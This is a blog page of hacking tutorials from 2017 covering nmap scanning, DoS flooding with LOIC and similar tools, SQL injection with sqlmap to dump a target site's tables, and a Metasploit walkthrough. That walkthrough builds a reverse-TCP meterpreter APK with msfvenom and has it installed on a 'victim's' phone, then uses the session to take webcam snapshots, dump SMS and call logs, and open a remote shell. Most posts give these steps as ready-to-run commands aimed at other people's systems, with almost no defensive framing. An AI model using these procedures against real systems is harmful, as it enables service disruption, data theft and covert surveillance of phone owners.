Search For Tutorial

Thursday, 23 March 2017

An Ultimate Guide to NMap and Port Scanning

Posted by Vijay Jangra
Second phase of ethical hacking is scanning and it is as important as information gathering. That’s where we use NMap and its handy features. Nmap (so called Network Mapper) is very useful and quite famous utility now days which you can for network scan. This post will walk you though nmap ports scan strategies.

It is available in both command line and graphical user interface. Other interesting things about nmap is that you can use it for other multi-purposes things  like host scanning, port scanning, vulnerability scanning, getting operating system and version.

★ Learn About DOS / DDOS Attack

It can be used to perform network scans to identify which services a target host is running, operating system, software, firewalls and much more.

nmap port scan tutorial guide


Downloading and Installing:-
Nmap is already installed in Kali Linux or other major penetration testing distros like backtrack. If you are using other platform like Windows, Linux you can download and install it from below link.


But before I show you port scanning using nmap, I recommend you to read one of my previous posts about TCP/UDP.

Nmap Scanning Types:-

TCP SYN Scan:-
Hope you have learnt about TCP/UDP and three way handshake from previous posts.
In SYN scan, we use TCP to connect with target but do not make full connections with target host system.
In other words, it send SYN packet, target host reply with SYN/ACK packet in response, now according to TCP our system should reply to SYN/ACK packet with ACK or Acknowledgement packet. But it’ll never do that. SYN scan will not reply to SYN/ACK. It does not make full connection with target.

Therefore, it is undetectable because windows record logs of complete connect but this TCP SYN does not make full connection with target host.
And that’s why we also call it stealth scan.


Now let’s perform a simple TCP SYN scan using nmap. Open terminal, type below command and hit enter.
nmap –vv –sS 192.168.12.51

nmap -> Name of tool to start
-v or -vv -> Verbose or very verbose used to make our scan result to appear in more understandable way.
-sS -> -s is used to define scan type and -sS is for SYN scan type.
192.168.12.51 or target host -> it is my target host’s ip address. You need to replace this IP Address with your target system’s IP address.

★ How to Hack an Android phone

TCP Scan:-    
It is same as TCP SYN scan but unlike TCP SYN, it replies to SYN/ACK packet and makes full connections with target system. Thus it makes it detectable. Moreover or important is that, it is used to scan for TCP ports only. Use below command for this scan.
nmap –vv –sT 192.168.12.51
-sT -> it refers to TCP scan type.

UDP Scan:-
This scan is used to scan for open UDP ports in target system. UDP is connectionless protocol. Hence it is not as reliable as TCP is. To perform a UDP Scan, use this syntax.
nmap –vv –sU 192.168.12.51
-sU refers to UDP scan type.
FIN Scan:-
Like SYN packet is used or sent to make connection, FIN is used to drop or to get disconnect from target system. This scan is very helpful in case if your target system have Firewalls or IDS. Simple syntax its command is as follows.
nmap –vv –sF 192.168.12.51
Where –sF is referring to FIN scan.

★ Best Hacking Tools Listed

Other NMap Usage:-

Detect Operating System: - To detect operating system of target system along with the scan use below command syntax.
nmap –vv –sS –O 192.168.12.51
-O option is used to detect operating system.


operating system scan using nmap

Scan Multiple Hosts: - You can perform scan for multiple hosts at one time. For this, you must write ip address of another second host just after the first by giving a space.
nmap –vv –sS 192.168.12.51 192.168.12.52
And so on.

You can scan entire subnet using this syntax.
nmap –vv –sS  192.168.12.1/24


Version Detection: - It is very useful feature in nmap. You can also detect software or service version. However version scan takes little bit more time than others.
nmap –vv –sV –sT 192.168.12.51
-sV option is used for version detection.

version scan in nmap

Scan for Specific Ports: - Consider a scenario where you want to scan only some specific ports on target.  You can do this using nmap using –p option with this syntax.
nmap –vv –sS –p80,443 192.168.12.51
Here in this example, I used –p nmap option to scan for port 80 and 443 only.

Another one, you can scan for open ports within specified. For example:-
nmap –vv –sT –p1-500 192.168.12.51
It’ll scan for open TCP ports within range of 1 to 500.


Now you need to keep practice nmap port scanning within your lab to understand it. Nmap is not just limited to these features only. You can learn more about this tool using google and other ethical hacking blogs. We’ll soon update this post so keep visiting to our blog or subscribe for our newsletter.


Read More
How To Become an Ethical Hacker

Learn how to become a hacker. An explained guide to learn how to become an ethical hacker. Teach yourself hacking in one year. Essential skills needed to become a hacker are programming ( Python, PHP, C++ etc.), Networking, Cryptography, Linux etc.

Saturday, 11 March 2017

What is DOS and DDOS Attack | Introduction to Denial of Service and LOIC

Posted by Vijay Jangra
In this tutorial we will talk about what is dos and ddos attack. Using DoS and DDoS , you can take down a web server from serving its services. We already know these DoS and DDoS terms as I introduced you about these in my previous post about website hacking methods.

But, again, first of all we would like to have a look at small introduction of both terms.

What is DoS?
                DoS stand for Denial of Service. As its name suggests, this attack makes victim’s server deny from serving its services to legitimate visitors. In other words, an attacker send too much traffic to a web server in a manner that the server immediately stop serving its services or slow down and its intended users will not be able access the server and its services any more until the attacker stop attacking.
What is DDoS?
                DDoS stands for Distributed Denial of Service. Sometimes, when our target is behind firewall and firewalls may deny the traffic from same IP Address if firewalls came to know that server is getting unexpected amount of traffic from same visitor or ip address.

In that case, we have DDoS. This attack is performed by various computers or by using multiple ip addresses. Then it becomes DDoS attack. Because they are using multiple IP addresses or multiple computer systems say about 1000 or more they will be able to success fully DDoS a server.

what is dos ddos


★  How to use SQLMap for SQLi

A list of some of the best DoS and DDoS website hacking tools is in the end of the post.

OK! Introduction is Enough Now.

Let’s start hacking. (Ohhh! Yeaah)

First of all, we will perform DoS attack using LOIC (Low Orbit Ion Conan) in Windows 8. Download link is in the end of the post. It is very effective and easy to understand tool. So let’s start.

Step 1:- Open LOIC. Locate the box named 1. Select the target. Now you have two choices to enter your target, either by entering URL or IP Address of victim. Choice is yours. After entering the target you need to click on Lock On button next to URL or IP Address based upon the method you used.


loic dos tool select target


Step 2:- In third box named Attack Options leave all options as it is. In the method box choose which type of traffic you want to use for DoS attack. You have TCP, UDP and HTTP. I am choosing UDP.  In TCP/UDP Message enter any text or message. This message will appear in header of packet.  For example, I am writing here, Hacked for the sake of this tutorial.

loic choose method


Step 3:- Finally, Click on big button named IMMA CHARGIN MAH LAZER to start the attack. As you can see in Attack Status, LOIC has already sent many requests till now.

loic launch dos attack


To stop attack, click on Stop Flooding button.
So that’s how to use famous DOS tool LOIC.

Best DOS and DDOS Tool
LOIC (Download)
HOIC (Download)
Hulk (Download)
GoldenEye (Download)
DDosim (Download)
SlowLoris (Download)

Now that you have basic of what is dos and ddos attack, you can perform dos attack using above tools.
Hope you enjoyed hacking. Hulk and Slowloris are Python and Perl scripts respectively.
To protect your server from DOS and DDOS you can use Honeypots and other Intrusion Detection Systems. 



Read More

Monday, 6 February 2017

How to View Saved WiFi Passwords in Windows and Android

Posted by Vijay Jangra
Our phone automatically connects to wifi connections which you used previously. Because your PC store those wifi passwords. Some times we need those passwords. And that's what this trick is all about. Using this trick you can view saved wifi password in your Android phone and Windows PC.

This trick, to get wifi password is very useful in some situation like, sometimes when  your friends asks for password but you forgot that or when you accidentally clicked on forgot connection option of that wifi connection.

In Windows, We have two options to view saved wifi passwords, one for currently connection and one for all connections. 

get view saved wifi password


Android phones store passwords in a configuration file named wifi_supplicant.conf 
You can open this file but only when your phone is rooted

So follow this guide. 

★ How to Hack Android Phones

Get saved Wi-Fi Password in Windows PC

Step 1:- Open Command Prompt. Press Windows + R to open run dialogue box window, cmd and hit enter.

Step 2:- Use below command to see password of any specific connection.

netsh wlan show profile name=connection key=clear

In above command, replace connection with name of wifi connection of which you wants to see password.

If you don't know the name of wifi. Use below command to see list of previously connected wifi list.

netsh wlan show profiles

View Saved Wi-Fi Passwords in Android Phone

For our task to be done. We need to fulfill following requirements.

-> Your phone must be rooted.

Step 1:- Download and install ES File Explorer app from Play Store or using above link.

Step 2: Open app and go to root directory of your phone. Ok Lets get more clear. Go to Phone Memory storage. You will see your current location above as in sdcard which should in 0 named folder. Click on Emulated just before 0 to go back more and than click / (slash) to go back more. And you will be in root directory.
Use below pattern if you find it hard to locate.

SdCard << 0 << Emulated<< /

root directory path



Step 3:- From root directory Go To data >> misc >> wifi 

Step 4:- Finally, you are in Wi-Fi folder. Open the file named wifi_supplicant.conf

wifi-supplicant-file


And you will see list of previously connected wifi connections with their passwords.

saved wifi password view


★ Best Hacking Apps for Android 2017

It is not that hard to get and view saved wifi passwords in android and windows. If you stuck at any step, feel free to ask us in comment section.

If you enjoyed this post, then give your one minute to Share this article with your friends and subscribe for our newsletter.

Read More

Sunday, 5 February 2017

How to Hack Website using SQL Injection Attack

Posted by Vijay Jangra
Sql Injection is most common website vulnerabilities found in dynamic website. In this tutorial we will hack a website database by sql injection attack using a popular sql injection tool named SQLMap.
Most of the website in the internet today are dynamic database driven website. But this also led to some vulnerabilities in database. From these vulnerabilities, SQL Injection is most dangerous and common. The reason why I am calling this vulnerability dangerous is because every website database consists important information about website and organization like address, emails, user name, passwords.

SQL Injection is a code injection method. In other words, An attacker injects its malicious SQL Code in any field to exploit and retrieve confidential information from database. 



hack website sql injection attack

In this post, We will hack a website database using SQLMap tool in Kali Linux. Because Kali Linux is my favorite and SQLMap comes pre loaded in Kali. You can also download SQLMap tool from below link.


SQLMap is open source and available for download on github.
You need Python 2.7 to run this in windows and or in any other operating system.

You also need a SQL Injection vulnerable website for this task. I have written another post about finding vulnerable website using google.


So Lets Start Hacking(My Favorite Words) with SQLmap.

Step 1:- Open terminal and use below command to retrieve Database Information of website.

sqlmap -u http://target.com/details.php?id=

-u refers to the link of website. I am using a simple imaginary url for the sake of this tutorial. You need to replace this url with your chosen site url. There should be id= or = parameter in url of website which denotes any specific column from database.

★ Command Prompt Tips Tricks

Step 2:- After getting database information, execute this command to get list of available databases on website.
sqlmap -u http://target.com/details.php?id= --dbs

This command will give you list of Databases. 

got database list sql injection attack


Step 3:- After getting Database, its time to get Tables list.

sqlmap -u http://target.com/details.php?id= -D db_name --tables

Replace db_name with the database name of which you wants to retrieve tables.

Step 4:- Now that you got tables, You need to get columns in that table.


sqlmap -u http://target.com/details.php?id= -D db_name -T table_name --columns

Replace table_name with your desired table in database.

★ Best Ethical Hacking Tools List 2017

Step 5:- After getting columns, we are interested in getting the data available in that column.

sqlmap -u http://target.com/details.php?id= -D db_name -T table_name -C column_name --dump

Replace the column_name with the name of column in table.
--dump command is used to retrieve.

Note:- Don’t forget to replace the url in all above used command with your target website url.


And that's all. Isn’t it too easy. Using this sql injection attack you can hack any vulnerable dynamic database driven website in minutes.

★ Learn more about SQL Injection

Keep Visiting for latest hacking tutorials or Else subscribe for our blog newsletter. Share it with your newbie friends.



Read More

Saturday, 28 January 2017

How to Hack an Android phone using Kali Linux

Posted by Vijay Jangra
As promised, I am here today to publish new post about how to hack an android phone remotely using Metasploit in Kali Linux. We have already learnt about the basics of metasploit in previous tutorial.


Using this method you can hack an android phone with just an app. We will use metasploit framework for this task which is already installed in Kali Linux. I recommend you download and install Kali Linux before moving to the process.


how to hack and android phone


An Intro

We will use a reverse tcp payload to get connection back from victim’s smartphone to our pc. Payload will be in standalone android apk executable format which you need to deliver and install in victim’s phone. This method will work for all android phones having android version 4.4 or higher.

Requirements

For our this task to be completed, we need following things.

Kali Linux

Internet Connection with good speed (For hacking over WAN)

Port Forwarding (For WAN)

Some Patience

OK, Now lets start.

How to Hack Website


Process

Step 1:- Boot in your Kali Linux and open Terminal.

Step 2:- Type ifconfig and make a note of your IP Address. This is your Private IP Address. We will use this if you and your victim are on same LAN connection. But if you want to hack your victims phone which is outside your LAN or say if you want to hack over WAN then you need your Public IP Address.

To get your Public IP Address, Go to whatismyip.com and make a note of your IP Address.

★ Command Prompt Tips Tricks

Step 3:- Go back to terminal and type following command to generate standalone android meterpreter payload. In below command, replace your_ip with your ip address.

 msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=4444 -o /root/virus.apk

Lets understand this command

generate payload using msfvenom


msfvenom - It is name of tool of Metasploit Framework used to generate payloads.
-p - It is specifying that we want to make a payload.
android/meterpreter/reverse_tcp - It is name of reverse tcp meterpreter android payload to hack android phones.
lhost= - It is used to specify the listening host for payload or where payload will send reverse tcp connection. It contains attacker’s (yours) ip address.
lport - To specify listening port on attackers system. I am setting it to 4444.
-o - It is used to specify the output path for executable payload.
/root/virus.apk - It is name and path of file along with .apk format.

After entering this command, you need to deliver and install this payload in your victim’s smartphone.
Step 4:- Use below commands in terminal one by one to setup the listener.

msfconsole - Name of tool.

use exploit/multi/handler - Setting up exploit handler to manage and listen for connection.

set lhost your_ip - Set up listening host. Replace your_ip with the ip address you used while making payload.

set lport 4444 - Set up listening port.

exploit handler set up


Step 5:- After setting up all those things, type run or exploit and hit enter to start our listener.

exploit handler listening



Step 6:- When your victim install and click on your app, you will get connection and session id like this.

got session metasploit


Now that you got session, You can execute any command in your victims phone remotely using this meterpreter payload.

To see the list of available commands, type ? and press enter.

Here is a small list of some commands and their action.

★ Bypass Android Lock Screen using this Simple Trick

webcam_snap - To get snapshot from victims camera.
dump_calllog - To get list of all Call Logs and Call History.
dump_sms - To get all messages.
shell - To get remote shell.

Now you can hack an android phone remotely using Kali Linux and Metasploit.
Share it with your friends.
Happy Hacking Friends.

★ How To Change IMEI Number
Read More

Friday, 27 January 2017

Metasploit Tutorials | What is Metasploit, Exploit, Payload

Posted by Vijay Jangra
"Any tool is a Weapon, If you hold it right. " - Ani DiFranco

In my previous post, we got idea of some some best hacking tools. I also mentioned Metasploit in that list. This is a metasploit tutorial post which covers basics of this great hacking tool.

If you are a complete beginner in penetration testing and ethical hacking field, then this is right place for you. This hacking tutorial for beginner covers questions like What is Metasploit ? You will get basic understanding of this tool at the end of this post.

★  Best Hacking Apps for Android

In this guide, We will also cover metasploit terminology to know about terms like Exploit, Payload, Auxiliary and Encoders. And in next post, We will learn to use metasploit to hack Android phone and Windows PC.


metasploit tutorial what is metasploit exploit payload


Metasploit Tutorial : Introduction

Actually, Metasploit is a framework not an application or software. Metasploit was created by H.D Moore in 2003. This framework in completely written in Ruby language. Now it is acquired by Rapid7.

Metasploit is used to test security of any system by exploiting any specific vulnerability. It is mostly used by Hackers and Penetration Testers. And do not forget that it is most important tool of penetration testing.

★ Command Prompt Tips Tricks



Download Metasploit

Metasploit is available in both paid and free version. Metasploit Pro is paid which is mostly used by professional security testers but you can download Metasploit Community edition which is free and open source. Community Edition provides you GUI web based interface but i recommend you to use Metasploit Framework which is mostly used in Command Line Interface. Use below link to go to the website and download Metasploit Framework.
Download Metasploit

Metasploit Framework is pre installed in Kali Linux. You can use it by typing msfconsole command in terminal.

Basic Terms

Metasploit basically consists of four thing i.e. Exploits, Payloads, Auxiliary and Nops/Encoders. Lets understand these things in more deep.

Exploit -> An exploit is maliciosus piece of code or a program written to take advantage of any vulnerability. This process is Exploitation. Exploit can be used to deliver Payloads.

★ Cool Notepad Tricks

Payload :-> After successfully exploiting vulnerability of target system. A hacker delivers another code which is bundled in Payload. You can think of it as a malware virus or worm which can be used to perform actions like installing new software, stealing files, deleting files, getting shell etc remotely. The most reliable payload of all time is meterpreter. Msfvenom tool is used to create standalone executable payloads.

Auxiliary -> Auxiliaries are other codes or scripts mostly used for scanning, fuzzing, sniffing and much more. You can also use them as vulnerability and port scanner.

★ How to become Ethical Hacker

Nops/Encoders -> To avoid detecting of Antiviruses and Firewalls, we have encoders which can be used to encode executable payloads. We can use encoders using msfencode tool. Msfencode encodes the original binary to avoid detection and then decode it at the time of execution.

That's all. It was a basic metasploit tutorial which is enough to answer your question What is metasloit ?

Now download metasploit and learn to use it. In our next post, We will use metasploit to hack android smartphone.



Read More